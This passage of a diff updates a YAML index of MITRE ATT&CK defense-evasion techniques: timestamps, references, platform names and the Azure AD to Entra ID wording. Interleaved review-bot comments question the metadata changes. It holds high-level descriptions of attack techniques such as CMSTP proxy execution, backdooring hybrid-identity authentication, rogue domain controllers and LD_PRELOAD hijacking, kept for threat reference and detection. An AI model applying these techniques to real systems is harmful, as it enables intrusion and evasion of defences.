+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
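Review bot: the `Deloitte Environment Awareness` reference changes URL as well as retrieval date in this hunk: `url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit` replaces the bare file URL removed in the earlier hunk and `Retrieved September 13, 2024` replaces May 18, 2021. Google Drive file links normally take the `/file/d/<id>/view` form, so confirm the `/edit` variant actually resolves before shipping it. The remaining reference entries are re-added in a different order with unchanged text, and the `x_mitre_attack_spec_version` move from 2.1.0 to 3.2.0 plus the new `revoked: false` match the other objects in this diff.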
@@ -4485,8 +4637,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
@@ -4505,13 +4657,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests: []
T1562.002:
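Review bot: rewriting the `url` host from twitter.com to x.com and resetting `Retrieved` to September 12, 2024 for the two Tyrer/Carr citations in this and the previous hunk changes the provenance of 2018 references without changing what was retrieved; the status IDs are identical and the old host redirects, so this is cosmetic. If the intent is link hygiene, the `url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/` context line in this hunk is the one that actually needs attention, since it is still plain http. If these values simply mirror the upstream ATT&CK bundle, say so in the commit message so nobody hand-edits them later.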
@@ -4626,7 +4777,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests: []
T1218.002:
@@ -4667,7 +4817,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
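Review bot: `modified` moves backwards for T1218.002 in this hunk (`- modified: '2022-05-11T14:00:00.188Z'` becomes `+ modified: '2022-03-11T19:01:55.821Z'`), and the same regression appears later for T1599.001, T1553.003, T1207, T1553.006, T1574.006, T1222, T1134.002 and T1548.001. Almost all of the replaced values carry the same `14:00:00.188Z` time component, which reads as a release-wide stamp rather than a per-object edit time, while the new values are earlier, object-specific timestamps. That is plausible if the index is now built from a different ATT&CK bundle, but it should be stated in the commit message, and anything that compares `modified` to decide whether a technique has changed will see these either as no-ops or as rollbacks.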
@@ -4706,8 +4856,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests: []
T1599.001:
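Review bot: T1218.002 loses `x_mitre_attack_spec_version` outright in this hunk (`- x_mitre_attack_spec_version: 2.1.0` with no `+` counterpart anywhere in the diff), whereas T1497.003 and T1218.003 earlier are bumped to 3.2.0. T1599.001 and T1207 get the same treatment further down. Either the source objects genuinely carry no spec version, in which case the generator should emit a default rather than omit the key so consumers see one shape, or the field was lost in the rewrite; check the source bundle for these three before merging.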
@@ -4730,7 +4878,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4769,12 +4917,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -4801,6 +4947,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4818,12 +4965,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
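Review bot: the platform rename in this hunk (`- Office 365` and `- Google Workspace` dropped, `+ - Identity Provider` and `+ - Office Suite` added, `x_mitre_version` 1.3 to 1.4 for T1550) changes which platform-specific indexes this technique should appear in. The same consolidation is applied to T1556.007, T1078.001 and T1548 later in the diff, where `Azure AD` is folded into `Identity Provider` as well. Any index or lookup keyed on the old platform strings has to be regenerated in the same change; otherwise these techniques silently disappear from the Office 365, Google Workspace and Azure AD views without turning up under the new names.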
@@ -4849,18 +4996,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4905,13 +5051,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests: []
T1553.003:
@@ -4983,7 +5128,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -5016,35 +5161,34 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
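Review bot: the `Azure AD` to `Microsoft Entra ID` / `Entra ID` rename in this hunk (continued in the next one) is confined to the prose, and that is the right scope. The service name `AzureADConnectAuthenticationAgentService` is the literal Windows service name and must stay as is, and the `(Citation: Azure AD Hybrid Identity)`, `(Citation: Azure AD Connect for Read Teamers)` and `(Citation: AADInternals Azure AD On-Prem to Cloud)` keys have to match their `source_name` entries exactly, so they must not be touched by any follow-up search-and-replace; the `Read Teamers` spelling in that key stays for the same reason. One consistency nit: the first mention is spelled out as `Microsoft Entra ID` and every later one as `Entra ID`, which is fine for a first mention but means a grep for either form alone misses the other.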
@@ -5052,9 +5196,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -5063,21 +5207,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -5117,9 +5262,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -5182,7 +5324,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -5242,7 +5383,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests: []
T1207:
@@ -5283,7 +5423,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5314,8 +5454,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests: []
T1553.006:
@@ -5405,7 +5543,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5429,12 +5567,11 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5513,7 +5650,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1112:
@@ -5598,12 +5734,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5622,6 +5757,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -5629,7 +5765,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -5649,29 +5784,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1535:
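Review bot: the reference refresh in this hunk is uneven. `Microsoft CreateProcess` and `Microsoft WinExec` move to `learn.microsoft.com` with a September 12, 2024 retrieval date, while `Windows NT Command Shell` and `Microsoft Environment Property` keep their `docs.microsoft.com/en-us/previous-versions//...?redirectedfrom=MSDN` URLs (note the double slash) and their 2014/2016 retrieval dates. If these values mirror the upstream ATT&CK bundle that is expected and should not be hand-edited; if they are curated here, the remaining two should be brought in line in the same pass. The `Microsoft Environment Property` entry is also moved from last to second position with unchanged text, which is reordering noise, and `revoked: false` is newly added for T1574.008 as for the other objects.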
@@ -5722,7 +5859,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -5789,12 +5925,11 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -5830,6 +5965,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -5841,16 +5980,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -5886,12 +6021,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
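Review bot: the two harmj0y references are correctly moved from `http://www.harmj0y.net/blog/...` to `https://blog.harmj0y.net/...`, which also upgrades them to TLS. The `TechNet Group Policy Basics` context line directly below still points at `blogs.technet.microsoft.com`, a blog host Microsoft migrated away from, so if this pass is updating dead or moved Microsoft links it should cover that one too; if the URLs are copied from upstream, leave it and note that in the commit message.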
@@ -5899,14 +6034,13 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5921,6 +6055,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -5929,18 +6064,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -5972,14 +6107,11 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -6100,7 +6232,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1070.001:
@@ -6174,12 +6305,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests: []
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
